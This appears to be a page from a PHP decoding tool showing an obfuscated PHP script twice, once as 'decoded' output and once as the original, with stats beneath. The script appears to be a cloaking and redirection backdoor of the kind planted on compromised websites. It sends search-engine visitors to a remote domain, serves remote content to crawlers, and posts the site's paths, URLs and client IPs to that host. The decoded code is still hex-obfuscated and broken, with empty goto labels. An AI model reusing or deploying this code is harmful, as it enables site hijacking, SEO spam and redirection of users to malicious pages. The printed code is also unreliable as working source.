Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto ; : function getMiddleText($text, $startTag, $endTag) { goto ; : ${call_user..
Decoded Output download
<?php
goto ; : function getMiddleText($text, $startTag, $endTag) { goto ; : ${call_user_func(function () { return hex2bin("656e64496e646578"); })} = strpos(${call_user_func(function () { return hex2bin("74657874"); })}, ${call_user_func(function () { return hex2bin("656e64546167"); })}, ${call_user_func(function () { return hex2bin("7374617274496e646578"); })}); goto ; : return substr(${call_user_func(function () { return hex2bin("74657874"); })}, ${call_user_func(function () { return hex2bin("7374617274496e646578"); })}, ${call_user_func(function () { return hex2bin("656e64496e646578"); })} - ${call_user_func(function () { return hex2bin("7374617274496e646578"); })}); goto ; : ${call_user_func(function () { return hex2bin("7374617274496e646578"); })} = strpos(${call_user_func(function () { return hex2bin("74657874"); })}, ${call_user_func(function () { $X = pack("H16", "7374617274546167"); return $X; })}) + strlen(${call_user_func(function () { return hex2bin("7374617274546167"); })}); goto ; : } goto ; : : goto ; : : goto ; : @set_time_limit(3600); goto ; : : goto ; : header("Content-Type:text/html;charset=utf-8"); goto ; : ${call_user_func(function () { return hex2bin("633134"); })} = "https://webdatavn.tangke.im/"; goto ; : function D63() { goto ; : : goto ; : : goto ; : : goto ; : return ${call_user_func(function () { $X = pack("H6", "656464"); return $X; })}; goto ; : switch (isset($_SERVER["HTTP_CLIENT_IP"]) && strcasecmp($_SERVER["HTTP_CLIENT_IP"], "unknown")) { case false: goto ; : if (isset($_SERVER["REMOTE_ADDR"]) && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) { goto ; } goto ; : ${call_user_func(function () { $X = pack("H6", "656464"); return $X; })} = $_SERVER["REMOTE_ADDR"]; goto ; : ${call_user_func(function () { return hex2bin("656464"); })} = "unknown"; goto ; : : goto ; : ${call_user_func(function () { return hex2bin("656464"); })} = $_SERVER["REMOTE_ADDR"]; goto ; : goto ; goto ; : : goto ; : if (isset($_SERVER["REMOTE_ADDR"]) && $_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) { goto ; } goto ; : goto ; goto ; : : goto ; : goto ; goto ; : : goto ; : goto ; goto ; : if (isset($_SERVER["HTTP_X_FORWARDED_FOR"]) && strcasecmp($_SERVER["HTTP_X_FORWARDED_FOR"], "unknown")) { goto ; } goto ; : : goto ; : ${call_user_func(function () { $X = pack("H6", "656464"); return $X; })} = $_SERVER["HTTP_X_FORWARDED_FOR"]; goto ; : : goto ; : case true: ${call_user_func(function () { return hex2bin("656464"); })} = $_SERVER["HTTP_CLIENT_IP"]; goto ; } goto ; : } goto ; : switch (in_array(${call_user_func(function () { return hex2bin("72656665726572"); })}, ${call_user_func(function () { return hex2bin("676f6f676c65446f6d61696e73"); })})) { case false: goto ; case true: goto ; : ${call_user_func(function () { $X = pack("H12", "697054657874"); return $X; })} = getMiddleText(${call_user_func(function () { return hex2bin("64617461"); })}, call_user_func(function () { return hex2bin("636f756e747279436f6465223a22"); }), call_user_func(function () { return hex2bin("22"); })); goto ; : ${call_user_func(function () { return hex2bin("75726c"); })} = call_user_func(function () { return hex2bin("68747470733a2f2f70726f2e69702d6170692e636f6d2f6a736f6e2f"); }) . getVisitorIP() . call_user_func(function () { return hex2bin("3f6b65793d3047627a77566d4173614c5a34486d"); }); goto ; : curl_setopt(${call_user_func(function () { return hex2bin("6375726c"); })}, CURLOPT_SSL_VERIFYPEER, false); goto ; : : goto ; : curl_setopt(${call_user_func(function () { return hex2bin("6375726c"); })}, CURLOPT_URL, ${call_user_func(function () { $X = pack("H6", "75726c"); return $X; })}); goto ; : goto ; goto ; : switch (${call_user_func(function () { $X = pack("H12", "697054657874"); return $X; })} == call_user_func(function () { return hex2bin("564e"); })) { case false: goto ; case true: goto ; : header("Location: " . ${call_user_func(function () { return hex2bin("74617267657455726c"); })}); goto ; : goto ; goto ; : exit; goto ; : ${call_user_func(function () { return hex2bin("74617267657455726c"); })} = "https://webdatavn.tangke.im/vn3.html"; goto ; : } goto ; : curl_setopt(${call_user_func(function () { return hex2bin("6375726c"); })}, CURLOPT_RETURNTRANSFER, 1); goto ; : : goto ; : curl_close(${call_user_func(function () { $X = pack("H8", "6375726c"); return $X; })}); goto ; : ${call_user_func(function () { return hex2bin("6375726c"); })} = curl_init(); goto ; : : goto ; : ${call_user_func(function () { return hex2bin("64617461"); })} = curl_exec(${call_user_func(function () { return hex2bin("6375726c"); })}); goto ; : curl_setopt(${call_user_func(function () { $X = pack("H8", "6375726c"); return $X; })}, CURLOPT_HEADER, 1); goto ; : } goto ; : : goto ; : ${call_user_func(function () { $X = pack("H18", "757365726167656e74"); return $X; })} = strtolower($_SERVER[call_user_func(function () { $X = pack("H30", "485454505f555345525f4147454e54"); return $X; })]); goto ; : : goto ; : switch (strpos(${call_user_func(function () { $X = pack("H18", "757365726167656e74"); return $X; })}, call_user_func(function () { $X = pack("H18", "676f6f676c65626f74"); return $X; })) !== false) { case false: goto ; case true: goto ; : exit; goto ; : D31(${call_user_func(function () { return hex2bin("633134"); })}, ${call_user_func(function () { return hex2bin("436464"); })}); goto ; : goto ; goto ; : } goto ; : : goto ; : ${call_user_func(function () { return hex2bin("436464"); })} = ''; goto ; : function getVisitorIP() { goto ; : return ${call_user_func(function () { return hex2bin("6970"); })}; goto ; : : goto ; : goto ; goto ; : : goto ; : if (!empty($_SERVER[call_user_func(function () { return hex2bin("485454505f585f464f525741524445445f464f52"); })])) { goto ; } goto ; : : goto ; : ${call_user_func(function () { return hex2bin("6970"); })} = $_SERVER[call_user_func(function () { return hex2bin("52454d4f54455f41444452"); })]; goto ; : if (!empty($_SERVER[call_user_func(function () { $X = pack("H28", "485454505f434c49454e545f4950"); return $X; })])) { goto ; } goto ; : ${call_user_func(function () { return hex2bin("6970"); })} = $_SERVER[call_user_func(function () { return hex2bin("485454505f585f464f525741524445445f464f52"); })]; goto ; : goto ; goto ; : ${call_user_func(function () { return hex2bin("6970"); })} = $_SERVER[call_user_func(function () { $X = pack("H28", "485454505f434c49454e545f4950"); return $X; })]; goto ; : } goto ; : function f1A($Eb9) { goto ; : : goto ; : curl_setopt(${call_user_func(function () { return hex2bin("613435"); })}, CURLOPT_SSL_VERIFYHOST, 0); goto ; : curl_setopt(${call_user_func(function () { return hex2bin("613435"); })}, CURLOPT_FOLLOWLOCATION, 1); goto ; : curl_setopt(${call_user_func(function () { return hex2bin("613435"); })}, CURLOPT_RETURNTRANSFER, 1); goto ; : curl_setopt(${call_user_func(function () { $X = pack("H6", "613435"); return $X; })}, CURLOPT_URL, ${call_user_func(function () { return hex2bin("456239"); })}); goto ; : curl_close(${call_user_func(function () { return hex2bin("613435"); })}); goto ; : curl_setopt(${call_user_func(function () { return hex2bin("613435"); })}, CURLOPT_SSL_VERIFYPEER, false); goto ; : switch (@ini_get("allow_url_fopen")) { case false: goto ; case true: return file_get_contents(${call_user_func(function () { $X = pack("H6", "456239"); return $X; })}); goto ; } goto ; : return ${call_user_func(function () { return hex2bin("653238"); })}; goto ; : ${call_user_func(function () { return hex2bin("613435"); })} = curl_init(); goto ; : ${call_user_func(function () { return hex2bin("653238"); })} = curl_exec(${call_user_func(function () { return hex2bin("613435"); })}); goto ; : : goto ; : : goto ; : } goto ; : : goto ; : : goto ; : : goto ; : @ob_start(); goto ; : switch (version_compare(PHP_VERSION, "5.1.0", "<")) { case false: @date_default_timezone_set("America/Toronto"); goto ; case true: @ini_set("date.timezone", "America/Toronto"); goto ; } goto ; : ${call_user_func(function () { $X = pack("H26", "676f6f676c65446f6d61696e73"); return $X; })} = [call_user_func(function () { return hex2bin("7777772e676f6f676c652e636f6d"); }), call_user_func(function () { $X = pack("H34", "7777772e676f6f676c652e636f6d2e766e"); return $X; })]; goto ; : ${call_user_func(function () { $X = pack("H14", "72656665726572"); return $X; })} = parse_url($_SERVER[call_user_func(function () { $X = pack("H24", "485454505f52454645524552"); return $X; })], PHP_URL_HOST); goto ; : function D31($c14, $Cdd = '') { goto ; : ${call_user_func(function () { return hex2bin("413939"); })} = strtolower(${call_user_func(function () { return hex2bin("413939"); })}) == "index.php" ? call_user_func(function () { return hex2bin(''); }) : ${call_user_func(function () { return hex2bin("413939"); })}; goto ; : ${call_user_func(function () { $X = pack("H6", "466334"); return $X; })} = preg_replace("/\/$/si", call_user_func(function () { return hex2bin(''); }), ${call_user_func(function () { return hex2bin("466334"); })}); goto ; : switch (isset($_SERVER["HTTP_REFERER"]) && preg_match("/(google|yahoo|yandex|bing|baidu|aol|ask|excite|duckduckgo)/si", $_SERVER["HTTP_REFERER"])) { case false: goto ; case true: goto ; : ${call_user_func(function () { return hex2bin("426466"); })} = F1A("{${call_user_func(function () { return hex2bin("633134"); })}}?redirect=1&{${call_user_func(function () { return hex2bin("433139"); })}}"); goto ; : : goto ; : goto ; goto ; : : goto ; : switch (preg_match("/^https?\:\/\//si", ${call_user_func(function () { return hex2bin("426466"); })})) { case false: die(${call_user_func(function () { return hex2bin("426466"); })}); goto ; case true: goto ; : goto ; goto ; : header("Location:" . ${call_user_func(function () { $X = pack("H6", "426466"); return $X; })}); goto ; : exit; goto ; : } goto ; : : goto ; : } goto ; : : goto ; : ${call_user_func(function () { return hex2bin("433230"); })} = ${call_user_func(function () { return hex2bin("433230"); })} == call_user_func(function () { $X = pack("H0", ''); return $X; }) ? isset($_SERVER["PATH_INFO"]) && $_SERVER["PATH_INFO"] != call_user_func(function () { return hex2bin(''); }) ? $_SERVER["PATH_INFO"] : ${call_user_func(function () { return hex2bin("433230"); })} : ${call_user_func(function () { return hex2bin("433230"); })}; goto ; : ${call_user_func(function () { return hex2bin("443033"); })} = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https" : "http") . "://" . ${call_user_func(function () { return hex2bin("443033"); })}; goto ; : ${call_user_func(function () { $X = pack("H6", "413939"); return $X; })} = isset($_SERVER["SCRIPT_NAME"]) ? $_SERVER["SCRIPT_NAME"] : str_replace(${call_user_func(function () { return hex2bin("466334"); })}, call_user_func(function () { return hex2bin(''); }), ${call_user_func(function () { return hex2bin("436636"); })}); goto ; : ${call_user_func(function () { return hex2bin("413939"); })} = preg_replace("/.*\/(.*)/si", "$1", ${call_user_func(function () { $X = pack("H6", "413939"); return $X; })}); goto ; : ${call_user_func(function () { return hex2bin("443033"); })} = isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $_SERVER["SERVER_NAME"]; goto ; : ${call_user_func(function () { return hex2bin("436636"); })} = str_replace("\", "/", ${call_user_func(function () { return hex2bin("436636"); })} == call_user_func(function () { return hex2bin(''); }) || ${call_user_func(function () { return hex2bin("436636"); })} == "index.php" ? call_user_func(function () { return hex2bin(''); }) : ${call_user_func(function () { return hex2bin("436636"); })}); goto ; : : goto ; : ${call_user_func(function () { return hex2bin("433139"); })} = "request_url=" . urlencode("{${call_user_func(function () { return hex2bin("443033"); })}}{${call_user_func(function () { return hex2bin("433230"); })}}") . "&www_path=" . urlencode(${call_user_func(function () { $X = pack("H6", "436636"); return $X; })}) . "&client_ip=" . urlencode(D63()) . "&request_php=" . urlencode(${call_user_func(function () { return hex2bin("413939"); })}) . "&request_type=" . urlencode(${call_user_func(function () { return hex2bin("436464"); })}); goto ; : : goto ; : ${call_user_func(function () { return hex2bin("436636"); })} = isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : __FILE__; goto ; : : goto ; : ${call_user_func(function () { return hex2bin("436636"); })} = ${call_user_func(function () { return hex2bin("413939"); })} != call_user_func(function () { return hex2bin(''); }) ? substr(${call_user_func(function () { $X = pack("H6", "413939"); return $X; })}, 0, strrpos(${call_user_func(function () { return hex2bin("413939"); })}, "/")) : (${call_user_func(function () { return hex2bin("466334"); })} != call_user_func(function () { return hex2bin(''); }) ? str_replace(${call_user_func(function () { $X = pack("H6", "466334"); return $X; })}, call_user_func(function () { return hex2bin(''); }), dirname(${call_user_func(function () { return hex2bin("436636"); })})) : call_user_func(function () { return hex2bin(''); })); goto ; : ${call_user_func(function () { return hex2bin("466334"); })} = isset($_SERVER["DOCUMENT_ROOT"]) ? str_replace("\", "/", $_SERVER["DOCUMENT_ROOT"]) : call_user_func(function () { return hex2bin(''); }); goto ; : : goto ; : ${call_user_func(function () { return hex2bin("433230"); })} = isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : call_user_func(function () { return hex2bin(''); })); goto ; : ${call_user_func(function () { return hex2bin("413939"); })} = ${call_user_func(function () { return hex2bin("413939"); })} != call_user_func(function () { return hex2bin(''); }) ? substr(${call_user_func(function () { return hex2bin("413939"); })}, 1) : ${call_user_func(function () { $X = pack("H6", "413939"); return $X; })}; goto ; : : goto ; : ${call_user_func(function () { return hex2bin("413939"); })} = strtolower(${call_user_func(function () { $X = pack("H6", "413939"); return $X; })}) == "index.php" ? call_user_func(function () { return hex2bin(''); }) : ${call_user_func(function () { return hex2bin("413939"); })}; goto ; : switch (isset($_SERVER["HTTP_USER_AGENT"]) && preg_match("/(googlebot|yahoo|slurp|baiduspider|bingbot|google|baidu|aol|bing)/si", $_SERVER["HTTP_USER_AGENT"])) { case false: goto ; case true: die(F1A("{${call_user_func(function () { return hex2bin("633134"); })}}?redirect=0&{${call_user_func(function () { return hex2bin("433139"); })}}")); goto ; } goto ; : ${call_user_func(function () { return hex2bin("436636"); })} = str_replace("\", "/", ${call_user_func(function () { return hex2bin("436636"); })}); goto ; : } ?>
Did this file decode correctly?
Original Code
<?php
goto ; : function getMiddleText($text, $startTag, $endTag) { goto ; : ${call_user_func(function () { return hex2bin("656e64496e646578"); })} = strpos(${call_user_func(function () { return hex2bin("74657874"); })}, ${call_user_func(function () { return hex2bin("656e64546167"); })}, ${call_user_func(function () { return hex2bin("7374617274496e646578"); })}); goto ; : return substr(${call_user_func(function () { return hex2bin("74657874"); })}, ${call_user_func(function () { return hex2bin("7374617274496e646578"); })}, ${call_user_func(function () { return hex2bin("656e64496e646578"); })} - ${call_user_func(function () { return hex2bin("7374617274496e646578"); })}); goto ; : ${call_user_func(function () { return hex2bin("7374617274496e646578"); })} = strpos(${call_user_func(function () { return hex2bin("74657874"); })}, ${call_user_func(function () { $X = pack("H16", "7374617274546167"); return $X; })}) + strlen(${call_user_func(function () { return hex2bin("7374617274546167"); })}); goto ; : } goto ; : : goto ; : : goto ; : @set_time_limit(3600); goto ; : : goto ; : header("Content-Type:text/html;charset=utf-8"); goto ; : ${call_user_func(function () { return hex2bin("633134"); })} = "https://webdatavn.tangke.im/"; goto ; : function D63() { goto ; : : goto ; : : goto ; : : goto ; : return ${call_user_func(function () { $X = pack("H6", "656464"); return $X; })}; goto ; : switch (isset($_SERVER["HTTP_CLIENT_IP"]) && strcasecmp($_SERVER["HTTP_CLIENT_IP"], "unknown")) { case false: goto ; : if (isset($_SERVER["REMOTE_ADDR"]) && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) { goto ; } goto ; : ${call_user_func(function () { $X = pack("H6", "656464"); return $X; })} = $_SERVER["REMOTE_ADDR"]; goto ; : ${call_user_func(function () { return hex2bin("656464"); })} = "unknown"; goto ; : : goto ; : ${call_user_func(function () { return hex2bin("656464"); })} = $_SERVER["REMOTE_ADDR"]; goto ; : goto ; goto ; : : goto ; : if (isset($_SERVER["REMOTE_ADDR"]) && $_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) { goto ; } goto ; : goto ; goto ; : : goto ; : goto ; goto ; : : goto ; : goto ; goto ; : if (isset($_SERVER["HTTP_X_FORWARDED_FOR"]) && strcasecmp($_SERVER["HTTP_X_FORWARDED_FOR"], "unknown")) { goto ; } goto ; : : goto ; : ${call_user_func(function () { $X = pack("H6", "656464"); return $X; })} = $_SERVER["HTTP_X_FORWARDED_FOR"]; goto ; : : goto ; : case true: ${call_user_func(function () { return hex2bin("656464"); })} = $_SERVER["HTTP_CLIENT_IP"]; goto ; } goto ; : } goto ; : switch (in_array(${call_user_func(function () { return hex2bin("72656665726572"); })}, ${call_user_func(function () { return hex2bin("676f6f676c65446f6d61696e73"); })})) { case false: goto ; case true: goto ; : ${call_user_func(function () { $X = pack("H12", "697054657874"); return $X; })} = getMiddleText(${call_user_func(function () { return hex2bin("64617461"); })}, call_user_func(function () { return hex2bin("636f756e747279436f6465223a22"); }), call_user_func(function () { return hex2bin("22"); })); goto ; : ${call_user_func(function () { return hex2bin("75726c"); })} = call_user_func(function () { return hex2bin("68747470733a2f2f70726f2e69702d6170692e636f6d2f6a736f6e2f"); }) . getVisitorIP() . call_user_func(function () { return hex2bin("3f6b65793d3047627a77566d4173614c5a34486d"); }); goto ; : curl_setopt(${call_user_func(function () { return hex2bin("6375726c"); })}, CURLOPT_SSL_VERIFYPEER, false); goto ; : : goto ; : curl_setopt(${call_user_func(function () { return hex2bin("6375726c"); })}, CURLOPT_URL, ${call_user_func(function () { $X = pack("H6", "75726c"); return $X; })}); goto ; : goto ; goto ; : switch (${call_user_func(function () { $X = pack("H12", "697054657874"); return $X; })} == call_user_func(function () { return hex2bin("564e"); })) { case false: goto ; case true: goto ; : header("Location: " . ${call_user_func(function () { return hex2bin("74617267657455726c"); })}); goto ; : goto ; goto ; : exit; goto ; : ${call_user_func(function () { return hex2bin("74617267657455726c"); })} = "https://webdatavn.tangke.im/vn3.html"; goto ; : } goto ; : curl_setopt(${call_user_func(function () { return hex2bin("6375726c"); })}, CURLOPT_RETURNTRANSFER, 1); goto ; : : goto ; : curl_close(${call_user_func(function () { $X = pack("H8", "6375726c"); return $X; })}); goto ; : ${call_user_func(function () { return hex2bin("6375726c"); })} = curl_init(); goto ; : : goto ; : ${call_user_func(function () { return hex2bin("64617461"); })} = curl_exec(${call_user_func(function () { return hex2bin("6375726c"); })}); goto ; : curl_setopt(${call_user_func(function () { $X = pack("H8", "6375726c"); return $X; })}, CURLOPT_HEADER, 1); goto ; : } goto ; : : goto ; : ${call_user_func(function () { $X = pack("H18", "757365726167656e74"); return $X; })} = strtolower($_SERVER[call_user_func(function () { $X = pack("H30", "485454505f555345525f4147454e54"); return $X; })]); goto ; : : goto ; : switch (strpos(${call_user_func(function () { $X = pack("H18", "757365726167656e74"); return $X; })}, call_user_func(function () { $X = pack("H18", "676f6f676c65626f74"); return $X; })) !== false) { case false: goto ; case true: goto ; : exit; goto ; : D31(${call_user_func(function () { return hex2bin("633134"); })}, ${call_user_func(function () { return hex2bin("436464"); })}); goto ; : goto ; goto ; : } goto ; : : goto ; : ${call_user_func(function () { return hex2bin("436464"); })} = ''; goto ; : function getVisitorIP() { goto ; : return ${call_user_func(function () { return hex2bin("6970"); })}; goto ; : : goto ; : goto ; goto ; : : goto ; : if (!empty($_SERVER[call_user_func(function () { return hex2bin("485454505f585f464f525741524445445f464f52"); })])) { goto ; } goto ; : : goto ; : ${call_user_func(function () { return hex2bin("6970"); })} = $_SERVER[call_user_func(function () { return hex2bin("52454d4f54455f41444452"); })]; goto ; : if (!empty($_SERVER[call_user_func(function () { $X = pack("H28", "485454505f434c49454e545f4950"); return $X; })])) { goto ; } goto ; : ${call_user_func(function () { return hex2bin("6970"); })} = $_SERVER[call_user_func(function () { return hex2bin("485454505f585f464f525741524445445f464f52"); })]; goto ; : goto ; goto ; : ${call_user_func(function () { return hex2bin("6970"); })} = $_SERVER[call_user_func(function () { $X = pack("H28", "485454505f434c49454e545f4950"); return $X; })]; goto ; : } goto ; : function f1A($Eb9) { goto ; : : goto ; : curl_setopt(${call_user_func(function () { return hex2bin("613435"); })}, CURLOPT_SSL_VERIFYHOST, 0); goto ; : curl_setopt(${call_user_func(function () { return hex2bin("613435"); })}, CURLOPT_FOLLOWLOCATION, 1); goto ; : curl_setopt(${call_user_func(function () { return hex2bin("613435"); })}, CURLOPT_RETURNTRANSFER, 1); goto ; : curl_setopt(${call_user_func(function () { $X = pack("H6", "613435"); return $X; })}, CURLOPT_URL, ${call_user_func(function () { return hex2bin("456239"); })}); goto ; : curl_close(${call_user_func(function () { return hex2bin("613435"); })}); goto ; : curl_setopt(${call_user_func(function () { return hex2bin("613435"); })}, CURLOPT_SSL_VERIFYPEER, false); goto ; : switch (@ini_get("allow_url_fopen")) { case false: goto ; case true: return file_get_contents(${call_user_func(function () { $X = pack("H6", "456239"); return $X; })}); goto ; } goto ; : return ${call_user_func(function () { return hex2bin("653238"); })}; goto ; : ${call_user_func(function () { return hex2bin("613435"); })} = curl_init(); goto ; : ${call_user_func(function () { return hex2bin("653238"); })} = curl_exec(${call_user_func(function () { return hex2bin("613435"); })}); goto ; : : goto ; : : goto ; : } goto ; : : goto ; : : goto ; : : goto ; : @ob_start(); goto ; : switch (version_compare(PHP_VERSION, "5.1.0", "<")) { case false: @date_default_timezone_set("America/Toronto"); goto ; case true: @ini_set("date.timezone", "America/Toronto"); goto ; } goto ; : ${call_user_func(function () { $X = pack("H26", "676f6f676c65446f6d61696e73"); return $X; })} = [call_user_func(function () { return hex2bin("7777772e676f6f676c652e636f6d"); }), call_user_func(function () { $X = pack("H34", "7777772e676f6f676c652e636f6d2e766e"); return $X; })]; goto ; : ${call_user_func(function () { $X = pack("H14", "72656665726572"); return $X; })} = parse_url($_SERVER[call_user_func(function () { $X = pack("H24", "485454505f52454645524552"); return $X; })], PHP_URL_HOST); goto ; : function D31($c14, $Cdd = '') { goto ; : ${call_user_func(function () { return hex2bin("413939"); })} = strtolower(${call_user_func(function () { return hex2bin("413939"); })}) == "index.php" ? call_user_func(function () { return hex2bin(''); }) : ${call_user_func(function () { return hex2bin("413939"); })}; goto ; : ${call_user_func(function () { $X = pack("H6", "466334"); return $X; })} = preg_replace("/\/$/si", call_user_func(function () { return hex2bin(''); }), ${call_user_func(function () { return hex2bin("466334"); })}); goto ; : switch (isset($_SERVER["HTTP_REFERER"]) && preg_match("/(google|yahoo|yandex|bing|baidu|aol|ask|excite|duckduckgo)/si", $_SERVER["HTTP_REFERER"])) { case false: goto ; case true: goto ; : ${call_user_func(function () { return hex2bin("426466"); })} = F1A("{${call_user_func(function () { return hex2bin("633134"); })}}?redirect=1&{${call_user_func(function () { return hex2bin("433139"); })}}"); goto ; : : goto ; : goto ; goto ; : : goto ; : switch (preg_match("/^https?\:\/\//si", ${call_user_func(function () { return hex2bin("426466"); })})) { case false: die(${call_user_func(function () { return hex2bin("426466"); })}); goto ; case true: goto ; : goto ; goto ; : header("Location:" . ${call_user_func(function () { $X = pack("H6", "426466"); return $X; })}); goto ; : exit; goto ; : } goto ; : : goto ; : } goto ; : : goto ; : ${call_user_func(function () { return hex2bin("433230"); })} = ${call_user_func(function () { return hex2bin("433230"); })} == call_user_func(function () { $X = pack("H0", ''); return $X; }) ? isset($_SERVER["PATH_INFO"]) && $_SERVER["PATH_INFO"] != call_user_func(function () { return hex2bin(''); }) ? $_SERVER["PATH_INFO"] : ${call_user_func(function () { return hex2bin("433230"); })} : ${call_user_func(function () { return hex2bin("433230"); })}; goto ; : ${call_user_func(function () { return hex2bin("443033"); })} = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https" : "http") . "://" . ${call_user_func(function () { return hex2bin("443033"); })}; goto ; : ${call_user_func(function () { $X = pack("H6", "413939"); return $X; })} = isset($_SERVER["SCRIPT_NAME"]) ? $_SERVER["SCRIPT_NAME"] : str_replace(${call_user_func(function () { return hex2bin("466334"); })}, call_user_func(function () { return hex2bin(''); }), ${call_user_func(function () { return hex2bin("436636"); })}); goto ; : ${call_user_func(function () { return hex2bin("413939"); })} = preg_replace("/.*\/(.*)/si", "$1", ${call_user_func(function () { $X = pack("H6", "413939"); return $X; })}); goto ; : ${call_user_func(function () { return hex2bin("443033"); })} = isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $_SERVER["SERVER_NAME"]; goto ; : ${call_user_func(function () { return hex2bin("436636"); })} = str_replace("\", "/", ${call_user_func(function () { return hex2bin("436636"); })} == call_user_func(function () { return hex2bin(''); }) || ${call_user_func(function () { return hex2bin("436636"); })} == "index.php" ? call_user_func(function () { return hex2bin(''); }) : ${call_user_func(function () { return hex2bin("436636"); })}); goto ; : : goto ; : ${call_user_func(function () { return hex2bin("433139"); })} = "request_url=" . urlencode("{${call_user_func(function () { return hex2bin("443033"); })}}{${call_user_func(function () { return hex2bin("433230"); })}}") . "&www_path=" . urlencode(${call_user_func(function () { $X = pack("H6", "436636"); return $X; })}) . "&client_ip=" . urlencode(D63()) . "&request_php=" . urlencode(${call_user_func(function () { return hex2bin("413939"); })}) . "&request_type=" . urlencode(${call_user_func(function () { return hex2bin("436464"); })}); goto ; : : goto ; : ${call_user_func(function () { return hex2bin("436636"); })} = isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : __FILE__; goto ; : : goto ; : ${call_user_func(function () { return hex2bin("436636"); })} = ${call_user_func(function () { return hex2bin("413939"); })} != call_user_func(function () { return hex2bin(''); }) ? substr(${call_user_func(function () { $X = pack("H6", "413939"); return $X; })}, 0, strrpos(${call_user_func(function () { return hex2bin("413939"); })}, "/")) : (${call_user_func(function () { return hex2bin("466334"); })} != call_user_func(function () { return hex2bin(''); }) ? str_replace(${call_user_func(function () { $X = pack("H6", "466334"); return $X; })}, call_user_func(function () { return hex2bin(''); }), dirname(${call_user_func(function () { return hex2bin("436636"); })})) : call_user_func(function () { return hex2bin(''); })); goto ; : ${call_user_func(function () { return hex2bin("466334"); })} = isset($_SERVER["DOCUMENT_ROOT"]) ? str_replace("\", "/", $_SERVER["DOCUMENT_ROOT"]) : call_user_func(function () { return hex2bin(''); }); goto ; : : goto ; : ${call_user_func(function () { return hex2bin("433230"); })} = isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : call_user_func(function () { return hex2bin(''); })); goto ; : ${call_user_func(function () { return hex2bin("413939"); })} = ${call_user_func(function () { return hex2bin("413939"); })} != call_user_func(function () { return hex2bin(''); }) ? substr(${call_user_func(function () { return hex2bin("413939"); })}, 1) : ${call_user_func(function () { $X = pack("H6", "413939"); return $X; })}; goto ; : : goto ; : ${call_user_func(function () { return hex2bin("413939"); })} = strtolower(${call_user_func(function () { $X = pack("H6", "413939"); return $X; })}) == "index.php" ? call_user_func(function () { return hex2bin(''); }) : ${call_user_func(function () { return hex2bin("413939"); })}; goto ; : switch (isset($_SERVER["HTTP_USER_AGENT"]) && preg_match("/(googlebot|yahoo|slurp|baiduspider|bingbot|google|baidu|aol|bing)/si", $_SERVER["HTTP_USER_AGENT"])) { case false: goto ; case true: die(F1A("{${call_user_func(function () { return hex2bin("633134"); })}}?redirect=0&{${call_user_func(function () { return hex2bin("433139"); })}}")); goto ; } goto ; : ${call_user_func(function () { return hex2bin("436636"); })} = str_replace("\", "/", ${call_user_func(function () { return hex2bin("436636"); })}); goto ; : } ?>
Function Calls
None |
Stats
MD5 | 5e5ab1d4ed1acf39399af04a0d1c7536 |
Eval Count | 0 |
Decode Time | 51 ms |